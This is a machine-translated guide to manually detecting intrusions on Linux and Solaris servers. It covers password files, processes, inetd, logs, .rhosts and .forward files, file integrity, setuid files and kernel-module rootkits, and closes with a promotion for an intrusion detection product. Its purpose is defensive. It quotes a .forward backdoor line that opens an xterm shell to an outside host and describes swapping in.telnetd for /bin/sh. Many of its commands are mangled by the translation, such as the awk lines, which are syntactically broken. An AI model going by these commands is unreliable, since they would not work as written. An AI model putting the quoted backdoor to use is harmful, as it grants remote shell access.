How Linux determines if its server is compromised

How can you tell if your server has been compromised? Just two hands is not enough, but two hands can also play some role, we first look at some of the UNIX system intrusion detection methods, for example, Linux and Solaris.

1. Check the system password file

First, from the obvious start, look at the passwd file, ls–l/etc/passwd see the date of the file modification.

Check what privileged users are in the passwd file, and the user with UID 0 in the system will be displayed.

Awk–f: ' $3==0 {print '} '/etc/passwd

　　

By the way, check the system for any empty passwords. Account:

Awk–f: ' Length ($) ==0 {print $} '/etc/shadow

　　

2. Check the process to see if there are any strange processes

Focus on viewing processes: PS–AEF | grep inetd

inetd is the UNIX system daemon, the normal inetd PID is compared to the front, if you see the output of a process similar to inetd–s/tmp/.xxx, focusing on the content behind the inetd–s. Under normal circumstances, the inetd service in the Linux system does not have the-s parameter, and of course does not use inetd to start a file, and the Solaris system is only inetd–s, also does not use inetd to start a particular file If you use the PS command to see inetd start a file, and you do not start the file yourself with inetd, it means someone has hacked into your system and has a simple backdoor with root access.

Enter PS–AEF to view the output information, paying particular attention to any processes that begin with./xxx. Once a strange process has been detected, the backdoor is checked for the intruder, run the kill–9 PID immediately to kill the process, and then run PS–AEF to see if the process is killed, and once such a process has been killed and restarted, it proves that the system has been placed in the automatic startup program script. This time to do a careful look: Find/-name program name –print, assuming the system is really the intruder placed the back door, according to the directory of the found program, will find a lot of interesting Dongdong J

The hidden process under UNIX is sometimes done by replacing the PS file, and detecting this method involves checking the file integrity, which we'll discuss later.

Next, follow the steps to locate the intruder's file directory on the server.

3, check the system daemon process

Check the/etc/inetd.conf file, enter: cat/etc/inetd.conf | Grep–v "^#", the output information is the remote service that your machine opens.

A general intruder can create a backdoor by directly replacing the IN.XXX program, such as with/bin/sh Replace in.telnetd and restart the inetd service, then all users telnet to the server will get a rootshell without entering a user name and password.

4. Check the network connection and listening port

Enter Netstat-an, list all the connections and listening ports on this machine to see if there are any illegal connections.

Enter NETSTAT–RN to see if the router and gateway settings are correct.

Enter Ifconfig–a to view the network card settings.

5. Check the System log

Command Last | More view the history of all users logged on to this computer under normal circumstances. But the last command relies on the syslog process, which has become an important target for intruders to attack. The intruder usually stops syslog in the system, looks at the syslog process, and determines if the syslog was last started properly because the syslog was executed as root, and if the syslog was found to have been illegally moved, it indicates a significant intrusion event.

Enter Ls–al/var/log under Linux

Enter LS–AL/VAR/ADM under Solaris

Check the wtmp utmp, including messgae and other files integrity and modification time is normal, this is a manual erasure of invasive traces of a method.

6. Check the core files in the system

Hacking a system by sending a malformed request to attack a server's service is a regular intrusion method, which is the typical RPC attack. This way has a certain success rate, that is, it can not be 100% guaranteed to successfully invade the system, and usually in the corresponding directory of the server to produce core files, global lookup system core files, input find/-name core–exec ls–l {} \; Determine if there is an intrusion behavior based on the directory in which the core resides and the core file that is queried.

7. Rhosts and. Forward

This is two of the more famous backdoor files, if you want to check whether your system is the intruder installed back door, you may wish to find these two files globally:

Find/-name ". Rhosts" –print

Find/-name ". Forward" –print

In a user's $home, the. rhosts file contains only two + numbers is very dangerous, if your system open 513 port (rlogin port, and Telnet function same), then anyone can use this user to log on to your system without any need for verification.

UNIX placing commands in the. Forward file is a common way to regain access under a user $home. Forward may be set as follows:

\username| " /usr/local/x11/bin/xterm-disp hacksys.other.dom:0.0–e/bin/sh "

The variant of this method includes changing the system's mail alias file (usually located in/etc/aliases). Note that this is just a simple transformation. A more advanced ability to run a simple script from. Forward executes arbitrary commands on standard input (after a small subset of preprocessing). The use of Smrsh can effectively stop the backdoor (although if you allow self-running Elm ' s filter or procmail class programs, there is a good chance there is a problem. Under the Solaris system, if you run the following command:

Ln-s/var/mail/luser ~/.forward

Then the set vacation is valid, then the/var/mail/luser will be copied to the ~/.forward, while the "|/usr/bin/vacation Me" will be appended, the old Symlink is moved to ~/.forward. Backup.

It is also possible to delete these two files directly.

8. Check System file Integrity

There are several ways to check the integrity of a file, usually by inputting the Ls–l file name to query and compare files, although this method is simple, but still has some practicality. However, if the LS file has been replaced, it is more troublesome. Under Linux can use rpm–v ' rpm–qf file name ' to query, the national query results are normal to determine whether the file is complete. There are many ways to use RPM to check the integrity of a file under Linux, and not to repeat it, you can get more formats with man rpm.

In Unix systems,/bin/login is a file that is often replaced by intruders as a backdoor, followed by the login backdoor:

In Unix, the login program is typically used to authenticate users with Telnet. The intruder obtains the source code of login and modifies it so that it checks the backdoor password when comparing the input password with the stored password. If a user enters a backdoor password, it ignores the password set by the administrator to get you in: This will allow intruders to enter any account, even the root directory. Because the backdoor password is an access that is generated before the user is logged in and logged to utmp and wtmp, the intruder can log in to get the shell without exposing the account. After the administrator notices the backdoor, use the "strings" command to search the login program for textual information. In many cases, the backdoor password will be true. The intruder will then start encrypting or changing the hidden password to invalidate the strings command. So many administrators use MD5 checksum to detect this backdoor. Unix system has the md5sum command, enter the md5sum file name to check the MD5 signature of the file. It is used in the following format: md5sum–b use binary to read the file, md5sum–c reverse check MD5 signature, md5sum–t use text to read the file.

As mentioned above, the daemon is not commented out in the daemon configuration file inetd.conf, for a simple example, if you open the Telnet service, the daemon configuration file will have a sentence: Telnet stream tcp nowait ROOT/USR/SBIN/IN.TELNETD in.telnetd

You can see that the file it is using is/usr/sbin/in.telnetd, checking the integrity of the file, and intruders often create a backdoor for themselves by replacing the service files that are allowed in the daemon.

Linux system/etc/crontab is also often exploited by the intruder of a file, check the integrity of the file, you can directly cat/etc/crontab, carefully read the file has not been exploited by the intruder to do other things.

There is a flaw in the way that a process is used to initiate a backdoor without replacing a file such as login, that is, once the system restarts, the process is killed, so the back door should start up when the system starts. Usually by checking the file under/ETC/RC.D to see if the system starts with a backdoor, how is this method a bit like checking the Trojan under Windows?

Speaking of which, in addition, if the existing property is issued in a directory for such a file:-rwsr-xr-x 1 root root xxx. SH, which indicates that any user who comes in after running this file can get a Rootshell, this is setuid file. Run Find–perm 4000–print to make a global lookup for such files, and then delete such files.

9, check the core-level backdoor

If your system has been installed this backdoor, usually is more annoying, I often think, in this case or reinstall the system forget J, to the bottom, first, check the system load module, the Linux system using the Lsmod command, Use the Modinfo command under the Solaris system to view. It is necessary to note that the general default installation of Linux loaded modules are relatively small, usually is the driver of the network card, and Solaris under a lot of, there is no other way, there is only one piece to analyze. After hardening the kernel, you should prohibit the insertion or removal of the module to protect the system, or the intruder will likely replace the system call again. We can achieve this by replacing Create_module () and Delete_module (). In addition, the kernel should be hardened as early as possible in case the system call has been replaced by the intruder. If the system is loaded with backdoor modules, but not in the module list/proc/module, it is possible to use the Hack tool to remove the loaded module, the famous Knark Toolkit has the tool to remove the loading module. In this case, you need to look closely at the/proc directory to determine which processes are hidden and disguised based on the files and experience found. The Knark backdoor module is in the/proc/knark directory, and of course this directory is hidden.

10, the defect of manual intrusion detection

The above talk about some methods of manual intrusion detection, but these methods have certain flaws, and some even unavoidable defects, which is why the manual detection is the "physical life". Let's take a look at these flaws first:

1) manual intrusion detection can only be based on the host, which means that all intrusion detection work can only be done under the operating system, which is its inherent flaw; basically all intrusions beyond the operating system are undetectable. Network-level intrusion, switches, routers above the intrusion and attack behavior, as the server's operating system is not known, the information has been sent out from the host, if the transmission of media is intercepted, the host's operating system is always indifferent.

2) manual intrusion detection requires proficiency in the operating system, and the vulnerability library data refresh quickly; Do a network management at the same time to do a hacker. It can be said that the accumulation of experience will never keep up with the update of the world's vulnerability data, the system is not compromised by new vulnerabilities.

3) manual intrusion detection is only "matter-of-factly", according to the occurrence of a situation to judge the invasion, and then make corresponding corresponding and preventive measures, and can not be pre-based on the intruder's detection behavior to the attack event description, define the event level, in the case of the system normal work to prevent the next intrusion of the system.

4) can detect some vulnerabilities on the host by manual intrusion detection, and then make corresponding security measures. But there is no way to avoid the phenomenon: two intruders can not be used to exploit the same vulnerability to attack the host, that is, unable to determine the attack mode to cut off the intrusion behavior.

5) In summary, the manual intrusion detection behavior for the system security is only a palliative but not the cure, most still rely on the skills and experience of the Administrator to enhance the security of the system, no, it is impossible to form a real security system, although better than nothing, can detect and trace to certain intrusion behavior, But it's hard to catch a trail if the same system-savvy intruder is encountered.

11, the comparison of intrusion detection system

Building a real security system requires intrusion detection system-ids, an excellent intrusion detection system with the skills and experience of the system administrator can form a real security system, effectively judge and cut off intrusion behavior, and truly protect the host, data. People sometimes think that ISS RealSecure is an excellent intrusion detection system, in fact, realsecure with a certain defect, do not talk about its false positives, false negatives and false reports, first of all it is an English software, the use and familiarity with a certain degree of difficulty. And because it is a foreigner's software, a lot of hack to realsecure have in-depth research, has uncovered some of its loopholes, even the inherent loopholes, I have tested some of the attack means can make realsecure paralysis. Moreover, RealSecure is also set up on the server operating system, the operating system stopped working, the same stop the work, in other words, very simple, the target of attackers is often the realsecure itself. Imagine that your system relies on an intrusion detection system, and the intrusion detection system is taken out by the attackers, your system will open the door, let the entrance, the consequences of unimaginable.

Full Chinese intrusion detection system of course, is relatively cool, Tian Khotan detection engine is one of the more typical, it has its own "black box", the intruder in the attack on a server, it is almost impossible to find the server to run the heavenly detection engine, which greatly increased the difficulty of the attack, improve the security of the server.

How Linux determines if its server is compromised